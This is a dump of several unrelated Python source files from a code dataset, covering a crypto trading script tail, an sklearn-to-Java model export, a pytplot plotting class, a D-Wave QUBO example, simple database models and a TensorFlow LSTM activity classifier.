i['currency'], 'exchanger': i['exchanger'], 'price': pric, 'count': count, 'time': time, 'loss': lost, 'processed': 0, 'term': i['term'], 'numsell': 1}\n\t\t\t\t\ttable.insert(x)\n\n\t\t\t\telse:\n\t\t\t\t\tfor j in range(1, len(x)+1):\n\t\t\t\t\t\tx[-j]['numsell'] = j\n\t\t\t\t\t\ttable.insert(x[-j])\n\n#Худший - лучший случай\n\t\t\t\tvol = price * count\n\t\t\t\tloss = (price - i['loss'][1]) * count if i['loss'][0] else vol * (1 - i['loss'][1])\n\t\t\t\tformated = 'Худший случай: -%fɃ (-%d₽)\\nЛучший случай: +%fɃ (+%d₽)' % (loss, loss / rub, su - vol, (su - vol) / rub)\n\t\t\t\tsend(formated)\n\t\t\telse:\n\t\t\t\tprint('Ошибка покупки!\\n')\n\t\t\t\tsend('Ошибка покупки!')\n\t\t\tsend('-' * 20)\n\nif __name__ == '__main__':\n\ttrade()","sub_path":"trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"651832877","text":"# import numpy as np\n# import matplotlib.pyplot as plt\n# from sklearn.metrics import classification_report, confusion_matrix\n\n# from sklearn import svm\n# from sklearn.pipeline import make_pipeline\n# from sklearn.preprocessing import StandardScaler\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn_porter import Porter\n\nimport os, sys\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\nimport s_data_loader as data_loader\n# dt = data_loader.load_feature_time()\ndt = data_loader.load_feature()\n\n# Mapping table for classes\nlabels = dt.labels\nx_train = dt.x_train\ny_train = dt.y_train\nx_test = dt.x_test\ny_test = dt.y_test\n\n\nskip_ratio = 10\nrx_train = x_train[::skip_ratio]\nry_train = y_train[::skip_ratio]\nrx_test = x_test[::skip_ratio]\nry_test = y_test[::skip_ratio]\n\n\nmodel = MLPClassifier(activation='relu', alpha=0.0001, batch_size='auto', beta_1=0.9,\n beta_2=0.999, early_stopping=False, epsilon=1e-08,\n hidden_layer_sizes=(), learning_rate='constant',\n learning_rate_init=0.001, max_iter=200, 
momentum=0.9,\n nesterovs_momentum=True, power_t=0.5, random_state=None,\n shuffle=True, solver='adam', tol=0.0001, validation_fraction=0.1,\n verbose=False, warm_start=False)\n\nmodel.fit(rx_train, ry_train)\n\nif not os.path.isdir(\"cp_xnn\"):\n os.mkdir(\"cp_xnn\")\nif not os.path.isdir(\"cp_xnn/dat\"):\n os.mkdir(\"cp_xnn/dat\")\n\n\ncpm_filename = \"cp_xnn/MLPClassifier.java\"\nprint(\"preper new trained model {}\".format(cpm_filename))\nif os.path.isfile(cpm_filename):\n os.unlink(cpm_filename)\nporter = Porter(model, language='java')\noutput = porter.export()\nwith open(cpm_filename, 'w+') as file:\n n = file.write(output)\n print(\"traned model saved in c: {} len: {}\".format(cpm_filename, len(output)))\nif not os.path.isfile(cpm_filename):\n print(\"Error: no training model saved\")\n sys.exit(0)\n\n\nprint(\"prepare test dat (for predict)...\")\nfor i in range(0, len(rx_test)):\n test_case = rx_test[i]\n cpd_filename = \"cp_xnn/dat/{}_{:04d}.tdat\".format(len(test_case), i)\n if os.path.isfile(cpd_filename):\n os.unlink(cpd_filename)\n\n with open(cpd_filename, 'w+') as file:\n for j in range(0, len(test_case)):\n if j == len(test_case) - 1:\n file.write(\"{:.3f}\".format(test_case[j]))\n else:\n file.write(\"{:.3f} \".format(test_case[j]))\nprint(\"total {} test prepared in cp_xnn/dat, each has {} features\".format(len(rx_test), len(rx_test[0])))\n\ncpi_filename = \"cp_xnn/cp_info.text\"\nwith open(cpi_filename, 'w+') as file:\n file.write(\"{}\\n\".format(len(rx_test)))\n file.write(\"{}\\n\".format(len(rx_test[0])))\n file.write(\"{}\\n\".format(skip_ratio))\n file.write(\"LinearSVC\\n\")\n\ncpp_filename = \"cp_xnn/pred_result.txt\"\nprint(\"clean up predict file {}\".format(cpp_filename))\nif os.path.isfile(cpp_filename):\n os.unlink(cpp_filename)\n\nprint(\"please go to cp_xnn subfolder, and prepare executable: compile {} to class by javac\".format(cpm_filename))\n","sub_path":"exp_port_1_xnn/xnn_train_all.py","file_name":"xnn_train_all.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"171851575","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/runner/work/PyTplot/PyTplot/pytplot/QtPlotter/TVarFigureAlt.py\n# Compiled at: 2020-04-24 00:12:01\n# Size of source mod 2**32: 13162 bytes\nimport pyqtgraph as pg, numpy as np, pytplot\nfrom CustomLegend.CustomLegend import CustomLegendItem\nimport CustomAxis.AxisItem as AxisItem\nimport CustomViewBox.NoPaddingPlot as NoPaddingPlot\n\nclass TVarFigureAlt(pg.GraphicsLayout):\n\n def __init__(self, tvar_name, show_xaxis=False, mouse_function=None):\n self.tvar_name = tvar_name\n self.show_xaxis = show_xaxis\n self.crosshair = pytplot.tplot_opt_glob['crosshair']\n pg.GraphicsLayout.__init__(self)\n self.layout.setHorizontalSpacing(50)\n self.layout.setContentsMargins(0, 0, 0, 0)\n self.xaxis = pg.AxisItem(orientation='bottom')\n self.xaxis.setHeight(35)\n self.xaxis.enableAutoSIPrefix(enable=False)\n self.yaxis = AxisItem('left')\n self.yaxis.setWidth(100)\n vb = NoPaddingPlot()\n self.plotwindow = self.addPlot(row=0, col=0, axisItems={'bottom':self.xaxis, 'left':self.yaxis}, viewBox=vb)\n self.legendvb = pg.ViewBox(enableMouse=False)\n self.legendvb.setMaximumWidth(100)\n self.legendvb.setXRange(0, 1, padding=0)\n self.legendvb.setYRange(0, 1, padding=0)\n self.addItem(self.legendvb, 0, 1)\n self.curves = []\n 
self.colors = self._setcolors()\n self.colormap = self._setcolormap()\n if pytplot.tplot_opt_glob['black_background']:\n self.labelStyle = {'font-size':str(pytplot.data_quants[self.tvar_name].attrs['plot_options']['extras']['char_size']) + 'pt', \n 'color':'#FFF'}\n else:\n self.labelStyle = {'font-size':str(pytplot.data_quants[self.tvar_name].attrs['plot_options']['extras']['char_size']) + 'pt', 'color':'#000'}\n if show_xaxis:\n self.plotwindow.showAxis('bottom')\n else:\n self.plotwindow.hideAxis('bottom')\n self._mouseMovedFunction = mouse_function\n self.vLine = pg.InfiniteLine(angle=90, movable=False, pen=(pg.mkPen('k')))\n self.hLine = pg.InfiniteLine(angle=0, movable=False, pen=(pg.mkPen('k')))\n self.plotwindow.addItem((self.vLine), ignoreBounds=True)\n self.plotwindow.addItem((self.hLine), ignoreBounds=True)\n self.vLine.setVisible(False)\n self.hLine.setVisible(False)\n self.label = pg.LabelItem(justify='left')\n self.addItem((self.label), row=1, col=0)\n self.hoverlegend = CustomLegendItem(offset=(0, 0))\n self.hoverlegend.setItem(pytplot.data_quants[self.tvar_name].attrs['plot_options']['xaxis_opt']['crosshair'] + ':', '0')\n self.hoverlegend.setItem(pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['crosshair'] + ':', '0')\n self.hoverlegend.setVisible(False)\n self.hoverlegend.setParentItem(self.plotwindow.vb)\n\n def buildfigure(self):\n self._setxrange()\n self._setyrange()\n self._setyaxistype()\n self._setzaxistype()\n self._setzrange()\n self._visdata()\n self._addtimebars()\n self._setxaxislabel()\n self._setyaxislabel()\n if self.crosshair:\n self._addmouseevents()\n self._addlegend()\n\n def getfig(self):\n return self\n\n def _setxaxislabel(self):\n (self.xaxis.setLabel)(*('Altitude', ), **self.labelStyle)\n\n def _setyaxislabel(self):\n if 'axis_subtitle' in pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']:\n label = pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['axis_label']\n sublabel = pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['axis_subtitle']\n (self.yaxis.setLabel)(f\"
{label} <br>
{sublabel} <\\\\center>\", **self.labelStyle)\n else:\n (self.yaxis.setLabel)((pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['axis_label']), **self.labelStyle)\n\n def _setyaxistype(self):\n if self._getyaxistype() == 'log':\n self.plotwindow.setLogMode(y=True)\n else:\n self.plotwindow.setLogMode(y=False)\n\n def _getyaxistype(self):\n if 'y_axis_type' in pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']:\n return pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_axis_type']\n return 'linear'\n\n def _setxrange(self):\n if 'alt_range' in pytplot.tplot_opt_glob:\n self.plotwindow.setXRange(pytplot.tplot_opt_glob['alt_range'][0], pytplot.tplot_opt_glob['alt_range'][1])\n else:\n return\n\n @staticmethod\n def getaxistype():\n axis_type = 'altitude'\n link_y_axis = False\n return (axis_type, link_y_axis)\n\n def _addmouseevents(self):\n if self.plotwindow.scene() is not None:\n self.plotwindow.scene().sigMouseMoved.connect(self._mousemoved)\n\n def _mousemoved(self, evt):\n pos = evt\n if self.plotwindow.sceneBoundingRect().contains(pos):\n mousepoint = self.plotwindow.vb.mapSceneToView(pos)\n index_x = int(mousepoint.x())\n index_y = int(mousepoint.y())\n if self._mouseMovedFunction is not None:\n self._mouseMovedFunction(int(mousepoint.x()))\n self.vLine.setPos(mousepoint.x())\n self.hLine.setPos(mousepoint.y())\n self.vLine.setVisible(True)\n self.hLine.setVisible(True)\n self.hoverlegend.setVisible(True)\n self.hoverlegend.setItem(pytplot.data_quants[self.tvar_name].attrs['plot_options']['xaxis_opt']['crosshair'] + ':', index_x)\n self.hoverlegend.setItem(pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['crosshair'] + ':', index_y)\n else:\n self.hoverlegend.setVisible(False)\n self.vLine.setVisible(False)\n self.hLine.setVisible(False)\n\n def _addlegend(self):\n if 'legend_names' in pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']:\n legend_names = pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['legend_names']\n if len(legend_names) != len(self.curves):\n print('Number of lines do not match length of legend names')\n elif len(legend_names) == 1:\n pos_array = [\n 0.5]\n else:\n pos_array = np.linspace(1, 0, len(legend_names))\n i = 0\n for legend_name in legend_names:\n if i + 1 == len(legend_names):\n text = pg.TextItem(text=legend_name, anchor=(0, 1.5), color=(self.colors[(i % len(self.colors))]))\n else:\n if i == 0:\n text = pg.TextItem(text=legend_name, anchor=(0, -0.5), color=(self.colors[(i % len(self.colors))]))\n else:\n text = pg.TextItem(text=legend_name, anchor=(0, 0.5), color=(self.colors[(i % len(self.colors))]))\n self.legendvb.addItem(text)\n text.setPos(0, pos_array[i])\n i += 1\n\n def _setzaxistype(self):\n if self._getzaxistype() == 'log':\n self.zscale = 'log'\n else:\n self.zscale = 'linear'\n\n def _getzaxistype(self):\n pass\n\n def _setcolors(self):\n if 'line_color' in pytplot.data_quants[self.tvar_name].attrs['plot_options']['extras']:\n return pytplot.data_quants[self.tvar_name].attrs['plot_options']['extras']['line_color']\n return pytplot.tplot_utilities.rgb_color(['k', 'r', 'seagreen', 'b', 'darkturquoise', 'm', 'goldenrod'])\n\n def _setcolormap(self):\n pass\n\n def _setyrange(self):\n if self._getyaxistype() == 'log' and not pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][0] <= 0:\n if pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][1] <= 0:\n 
return\n self.plotwindow.vb.setYRange((np.log10(pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][0])), (np.log10(pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][1])),\n padding=0)\n else:\n self.plotwindow.vb.setYRange((pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][0]), (pytplot.data_quants[self.tvar_name].attrs['plot_options']['yaxis_opt']['y_range'][1]),\n padding=0)\n\n def _setzrange(self):\n pass\n\n def _addtimebars(self):\n datasets = []\n tbardict = pytplot.data_quants[self.tvar_name].attrs['plot_options']['time_bar']\n ltbar = len(tbardict)\n datasets = [\n pytplot.data_quants[self.tvar_name]]\n for oplot_name in pytplot.data_quants[self.tvar_name].attrs['plot_options']['overplots']:\n datasets.append(pytplot.data_quants[oplot_name])\n\n for dataset in datasets:\n dataset = pytplot.tplot_utilities.convert_tplotxarray_to_pandas_dataframe(dataset.name)\n for i in range(ltbar):\n test_time = pytplot.data_quants[self.tvar_name].attrs['plot_options']['time_bar'][i]['location']\n color = pytplot.data_quants[self.tvar_name].attrs['plot_options']['time_bar'][i]['line_color']\n pointsize = pytplot.data_quants[self.tvar_name].attrs['plot_options']['time_bar'][i]['line_width']\n time = pytplot.data_quants[pytplot.data_quants[self.tvar_name].attrs['plot_options']['links']['alt']].coords['time'].values\n altitude = pytplot.data_quants[pytplot.data_quants[self.tvar_name].attrs['plot_options']['links']['alt']].values\n nearest_time_index = np.abs(time - test_time).argmin()\n data_point = dataset.iloc[nearest_time_index][0]\n alt_point = altitude[nearest_time_index]\n self.plotwindow.scatterPlot([alt_point], [data_point], size=pointsize, pen=(pg.mkPen(None)), brush=color)\n\n def _visdata(self):\n datasets = [\n pytplot.data_quants[self.tvar_name]]\n for oplot_name in pytplot.data_quants[self.tvar_name].attrs['plot_options']['overplots']:\n datasets.append(pytplot.data_quants[oplot_name])\n\n line_num = 0\n for dataset_xr in datasets:\n dataset = pytplot.tplot_utilities.convert_tplotxarray_to_pandas_dataframe(dataset_xr.name)\n coords = pytplot.tplot_utilities.return_interpolated_link_dict(dataset_xr, ['alt'])\n for i in range(0, len(dataset.columns)):\n t_link = coords['alt'].coords['time'].values\n x = coords['alt'].values\n t_tvar = dataset.index.values\n data = dataset[i].values\n while t_tvar[(-1)] > t_link[(-1)]:\n t_tvar = np.delete(t_tvar, -1)\n data = np.delete(data, -1)\n\n while t_tvar[0] < t_link[0]:\n t_tvar = np.delete(t_tvar, 0)\n data = np.delete(data, 0)\n\n self.curves.append(self.plotwindow.scatterPlot((x.tolist()), (data.tolist()), pen=(pg.mkPen(None)),\n brush=(self.colors[(line_num % len(self.colors))])))\n line_num += 1","sub_path":"pycfiles/pytplot-1.6.1.tar/TVarFigureAlt.cpython-37.py","file_name":"TVarFigureAlt.cpython-37.py","file_ext":"py","file_size_in_byte":11532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"511770474","text":"from dwave.system import DWaveSampler, EmbeddingComposite, LeapHybridSampler\n\n\n\n# ---------- For Quantum Tests ----------\n# sampler_auto = EmbeddingComposite(DWaveSampler(solver={'qpu': True}))\n\n# ---------- For Hybrid Tests ----------\nsampler_auto = LeapHybridSampler()\n\n# Set Q for the problem QUBO\nlinear = {('E', 'E'): 3}\n# ( 8AB + 8AC + 8AD − 4AE + 8BC + 8BD − 4BE + 8CD − 4CE − 4DE + 3E + 1)\nquadratic = {('A', 'B'): 8, ('A', 'C'): 8, ('A', 'D'): 8, ('A', 'E'): -4, ('B', 
'C'): 8,\n ('B', 'D'): 8, ('B', 'E'): -4, ('C', 'D'): 8, ('C', 'E'): -4, ('D', 'E'): -4}\nQ = dict(linear)\nQ.update(quadratic)\n\n\n\n# ---------- For Quantum Tests ----------\n# Minor-embed and sample 1000 times on a default D-Wave system\n\n# sampleset = sampler_auto.sample_qubo(Q, num_reads=1000)\n\n\n# ---------- For Hybrid Tests ----------\nsampleset = sampler_auto.sample_qubo(Q)\n\n\n\n\nprint(sampleset)\n","sub_path":"HBD_Solved_with_QUBO.py","file_name":"HBD_Solved_with_QUBO.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"620048396","text":"## models.py\nfrom banco import bd\n\n\nclass Post:\n def __init__(self, titulo, autor, texto):\n self.titulo = titulo\n self.autor = autor\n self.texto = texto\n\n def gravar(self):\n sql = '''insert into posts (titulo, autor, texto) values (?, ?, ?)'''\n primeiro_interrogacao = self.titulo\n segundo_interrogacao = self.autor\n terceiro_interrogacao = self.texto\n bd().execute(sql, [primeiro_interrogacao, segundo_interrogacao, terceiro_interrogacao])\n bd().commit()\n\n @staticmethod\n def recupera_todos():\n ## Usamos o objeto retornado por bd() para realizar comandos sql\n sql = '''select titulo, autor, texto from posts order by id desc'''\n cur = bd().execute(sql)\n ## Montamos dicionário dicionários com os resultados da consulta para passar para a view\n posts = []\n for titulo, autor, texto in cur.fetchall(): # fetchall() gera uma lista com os resultados:\n post = Post(titulo, autor, texto)\n posts.append(post)\n \n return posts\n\n\nclass Presenca:\n def __init__(self, email, presente, resposta, comentarios):\n self.email = email\n self.presente = presente\n self.resposta = resposta\n self.comentarios = comentarios\n\n def gravar_presenca(self):\n sql = '''insert into presenca (email, presente, resposta, comentarios) values (?, ?, ?, ?)'''\n first_email = self.email\n second_presente = self.presente\n third_resposta = self.resposta\n fourth_comentarios = self.comentarios\n bd().execute(sql, [first_email, second_presente, third_resposta, fourth_comentarios])\n bd().commit()\n\n @staticmethod\n def recupera_presentes():\n ## Usamos o objeto retornado por bd() para realizar comandos sql\n sql = '''select email, presente, resposta, comentarios from presenca order by id desc'''\n cur = bd().execute(sql)\n ## Montamos dicionário dicionários com os resultados da consulta para passar para a view\n presencas = []\n for email, presente, resposta, comentarios in cur.fetchall(): # fetchall() gera uma lista com os resultados:\n presenca = Presenca(email, presente, resposta, comentarios)\n presencas.append(presenca)\n \n return presencas\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"209520699","text":"\"\"\"Human activity recognition using smartphones dataset and an LSTM RNN.\"\"\"\n\n# https://github.com/guillaume-chevalier/LSTM-Human-Activity-Recognition\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2016 Guillaume Chevalier\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the 
Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n# Also thanks to Zhao Yu for converting the \".ipynb\" notebook to this \".py\"\n# file which I continued to maintain.\n\n# Note that the dataset must be already downloaded for this script to work.\n# To download the dataset, do:\n# $ cd data/\n# $ python download_dataset.py\n\n\nimport tensorflow as tf\nimport numpy as np\n\n###################################################################\n# 载入数据,神经网络的训练集的和测试集的输入\ndef loadData(X_signals_paths):\n X_signals = []\n\n # 遍历读取文件\n for signal_type_path in X_signals_paths:\n file = open(signal_type_path, 'r')\n # 读取数据集,并进行文本处理\n X_signals.append(\n [np.array(serie, dtype=np.float32) for serie in [\n # 文件每一行进行处理\n row.replace(' ', ' ').strip().split(' ') for row in file]]\n )\n # X_signals大小为 9*7352*128,9个特征文件,7352个样本,128个时间点\n file.close()\n\n # 转换维度,(9*7352*128) -> (7352, 128, 9)\n return np.transpose(np.array(X_signals), (1, 2, 0))\n\n###################################################################\n# 载入数据集y,神经网络的训练集的和测试集的输出\ndef loadY(y_path):\n file = open(y_path, 'r')\n # 读取数据集,并进行文本处理\n y_ = np.array(\n [val for val in [\n row.replace(' ', ' ').strip().split(' ') for row in file\n ]],\n dtype=np.int32\n )\n file.close()\n # 将每个输出减去1,以获得基于0的索引\n return y_ - 1\n\n###################################################################\n# 将输出类转换为哑变量编码形式,\n# 如[[5], [0], [3]] -> [[0,0,0,0,0,1], [1,0,0,0,0,0], [0,0,0,1,0,0]]\ndef oneHot(y_):\n # (7352, 1) -> (7352,)\n y_ = y_.reshape(len(y_))\n # 7 = 6 + 1\n n_values = int(np.max(y_)) + 1\n # np.eye为对角矩阵,然后将[np.array(y_, dtype=np.int32)]当做索引\n # 选择np.eye对应的值\n return np.eye(n_values)[np.array(y_, dtype=np.int32)]\n\n###################################################################\n# 模型参数\nclass Config(object):\n '''\n 定义类用于存储参数,输入应该是训练集和测试集的特征\n 注: 使用HyperOpt搜索空间会更有趣,地址:\n https://github.com/hyperopt/hyperopt\n '''\n def __init__(self, X_train, X_test):\n # 输入数据\n # 训练集样本数, 7352\n self.train_cnt = len(X_train)\n # 测试集样本数, 2947\n self.test_cnt = len(X_test)\n # 时间步长, 128\n self.n_steps = len(X_train[0])\n\n # 训练参数\n # 学习速率\n self.learning_rate = 0.0025\n self.lambda_loss_amount = 0.0015\n # 迭代次数\n self.training_epochs = 300\n # 批处理数据量\n self.batch_size = 1500\n\n # LSTM结构\n # 特征有9个,3 * 3D的传感器特征\n self.n_inputs = len(X_train[0][0])\n # 神经网络的隐藏层单元数\n self.n_hidden = 32\n # 最后输出类\n self.n_classes = 6\n # 权重\n self.W = {\n 'hidden': tf.Variable(tf.random_normal([self.n_inputs, self.n_hidden])),\n 'output': tf.Variable(tf.random_normal([self.n_hidden, self.n_classes]))\n }\n # 偏差\n self.biases = {\n 'hidden': tf.Variable(tf.random_normal([self.n_hidden], mean=1.0)),\n 'output': tf.Variable(tf.random_normal([self.n_classes]))\n }\n\n###################################################################\n# lstm网络结构\ndef lstmNetwork(X, config):\n '''\n 使用两层堆叠的lstm单元的rnn,两个lstm单元堆叠在一起,增加了神经网络的深度。\n\n 参数:\n X: 数组特征矩阵,维度: 
[batch_size, time_steps, n_inputs]\n config: 神经网络的配置参数\n '''\n\n # 注意: This step could be greatly optimised by shaping the dataset once\n # 输入维度: (batch_size, n_steps, n_input)\n # 交换n_steps和batch_size的位置\n # (batch_size, n_steps, n_input) -> (n_steps, batch_size, n_input)\n X = tf.transpose(X, [1, 0, 2])\n # 重塑维度,作为隐藏层激活的输入\n # (n_steps, batch_size, n_input) -> (n_steps*batch_size, n_input)\n X = tf.reshape(X, [-1, config.n_inputs])\n\n # relu激活函数\n X = tf.nn.relu(tf.matmul(X, config.W['hidden']) + config.biases['hidden'])\n # 切分数据集,因为rnn神经元需要rnn内部循环的输入列表\n # (n_steps*batch_size, n_input) -> n_steps * (batch_size, n_hidden)\n X = tf.split(X, config.n_steps, 0)\n\n # 定义两层堆叠的lstm单元(两层循环神经元)\n # forget_bias=1, 不会忘记任何信息;等于0,全部忘记\n # state_is_tuple: 返回的状态用一个元祖表\n lstm_cell_1 = tf.contrib.rnn.BasicLSTMCell(config.n_hidden, forget_bias=1.0, state_is_tuple=True)\n lstm_cell_2 = tf.contrib.rnn.BasicLSTMCell(config.n_hidden, forget_bias=1.0, state_is_tuple=True)\n # 堆叠两层lstm\n lstm_cells = tf.contrib.rnn.MultiRNNCell([lstm_cell_1, lstm_cell_2], state_is_tuple=True)\n # lstm单元的输出,使用静态rnn\n outputs, states = tf.contrib.rnn.static_rnn(lstm_cells, X, dtype=tf.float32)\n\n # 对于一个多对一的分类器,取最后时刻的输出特征\n # 如本业顶部rnn的描述图片\n lstm_last_output = outputs[-1]\n\n # 线性激活函数\n return tf.matmul(lstm_last_output, config.W['output']) + config.biases['output']\n\n\n###################################################################\n# 主程序\nif __name__ == '__main__':\n\n # -----------------------------\n # Step 1: 载入数据\n # -----------------------------\n\n # 这些是神经网络的单独的标准化输入特征\n input_signal_types = [\n 'body_acc_x_',\n 'body_acc_y_',\n 'body_acc_z_',\n 'body_gyro_x_',\n 'body_gyro_y_',\n 'body_gyro_z_',\n 'total_acc_x_',\n 'total_acc_y_',\n 'total_acc_z_'\n ]\n\n # 输出类来学习如何分类\n labels = [\n 'WALKING',\n 'WALKING_UPSTAIRS',\n 'WALKING_DOWNSTAIRS',\n 'SITTING',\n 'STANDING',\n 'LAYING'\n ]\n\n # 数据路径\n data_path = 'raw_data/'\n dataset_path = data_path + 'UCI HAR Dataset/'\n\n train = 'train/'\n test = 'test/'\n\n # 读取训练集\n X_train_signals_paths = [\n dataset_path + train + 'Inertial Signals/' + signal + 'train.txt' for signal in input_signal_types\n ]\n # 读取测试集\n X_test_signals_paths = [\n dataset_path + test + 'Inertial Signals/' + signal + 'test.txt' for signal in input_signal_types\n ]\n\n # 载入数据集\n X_train = loadData(X_train_signals_paths)\n X_test = loadData(X_test_signals_paths)\n\n # 输出类的路径\n y_train_path = dataset_path + train + 'y_train.txt'\n y_test_path = dataset_path + test + 'y_test.txt'\n # 将输出类转为哑变量形式\n y_train = oneHot(loadY(y_train_path))\n y_test = oneHot(loadY(y_test_path))\n\n # -----------------------------------\n # Step 2: 定义模型参数\n # -----------------------------------\n config = Config(X_train, X_test)\n print(\"Some useful info to get an insight on dataset's shape and normalisation:\")\n print('features shape, labels shape, each features mean, each features standard deviation')\n print(X_test.shape, y_test.shape, np.mean(X_test), np.std(X_test))\n print('the dataset is therefore properly normalised, as expected.')\n\n # ------------------------------------------------------\n # Step 3: 建立神经网络\n # ------------------------------------------------------\n\n # 定义形参\n X = tf.placeholder(tf.float32, [None, config.n_steps, config.n_inputs])\n y = tf.placeholder(tf.float32, [None, config.n_classes])\n\n # 预测值y\n pred_y = lstmNetwork(X, config)\n\n # 对每个变量加上l2范数, trainable_variables: 返回的是需要训练的变量列表\n l2 = config.lambda_loss_amount * \\\n sum(tf.nn.l2_loss(tf_var) for tf_var in tf.trainable_variables())\n # 
损失函数 + L2\n cost = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=pred_y)) + l2\n # 优化方法\n optimizer = tf.train.AdamOptimizer(\n learning_rate=config.learning_rate).minimize(cost)\n # 准确率\n correct_pred = tf.equal(tf.argmax(pred_y, 1), tf.argmax(y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, dtype=tf.float32))\n\n # --------------------------------------------\n # Step 4: 训练网络\n # --------------------------------------------\n\n # 注意,log_device_placement可以打开,但会导致console多出很多信息\n # tf.InteractiveSession: 加载它自身作为默认构建的session\n sess = tf.InteractiveSession(config=tf.ConfigProto(log_device_placement=False))\n init = tf.global_variables_initializer()\n sess.run(init)\n\n # 初始最佳准确率\n best_accuracy = 0.0\n # 开始每个batch和loop epochs的训练\n for i in range(config.training_epochs):\n for start, end in zip(range(0, config.train_cnt, config.batch_size),\n range(config.batch_size, config.train_cnt + 1, config.batch_size)):\n sess.run(optimizer, feed_dict={X: X_train[start: end],\n y: y_train[start: end]})\n\n # 每迭代一次进行测试,计算准确率\n pred_out, accuracy_out, loss_out = sess.run(\n [pred_y, accuracy, cost], feed_dict={X: X_test, y: y_test})\n\n print('train iter: {},'.format(i) +\n ' test accuracy: {},'.format(accuracy_out) +\n ' loss: {}'.format(loss_out))\n best_accuracy = max(best_accuracy, accuracy_out)\n\n print('')\n print('final test accuracy: {}'.format(accuracy_out))\n print(\"best epoch's test accuracy: {}\".format(best_accuracy))\n print('')\n\n","sub_path":"lstm_for_human_activity_recognition/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":11283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"152052012","text":"import csv\nimport random\n\n\ndef get_data(filename, location, sensor):\n data = []\n first = True\n\n file = open(filename, \"r\")\n csv_reader = csv.reader(file, delimiter=\",\")\n for row in csv_reader:\n if row[0] == location:\n if first:\n data.append({'id': int(0), 'value': float(row[sensor])})\n first_value = int(row[1])\n first = False\n else:\n data.append({'id': (int(row[1]) - first_value) / 1000, 'value': float(row[sensor])})\n file.close()\n\n return data\n\n\ndef randomly(seq):\n shuffled = list(seq)\n random.shuffle(shuffled)\n return iter(shuffled)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"514211764","text":"\"\"\"Create the input data pipeline using `tf.data`\"\"\"\n\nimport tensorflow as tf\n\n\ndef _parse_function(image, label, size):\n \"\"\"Reshape the image and convert to float value (for both training and validation).\n\n The following operations are applied:\n - Reshape to [None, size, size, 1]\n - Convert to float\n \"\"\"\n # This will convert to float values in [0, 1]\n image = tf.image.convert_image_dtype(image, tf.float32)\n\n resized_image = tf.reshape(image, [size, size, 1])\n\n return resized_image, label\n\n\ndef input_fn(is_training, images, labels, params):\n \"\"\"Input function for the FASHION-MNIST dataset.\n\n Args:\n is_training: (bool) whether to use the train or test pipeline.\n At training, we shuffle the data and have multiple epochs\n images: (np.array) images as a big numpy array\n labels: (np.array) corresponding labels\n params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)\n \"\"\"\n num_samples = len(images)\n assert len(images) == len(labels), \"Images and 
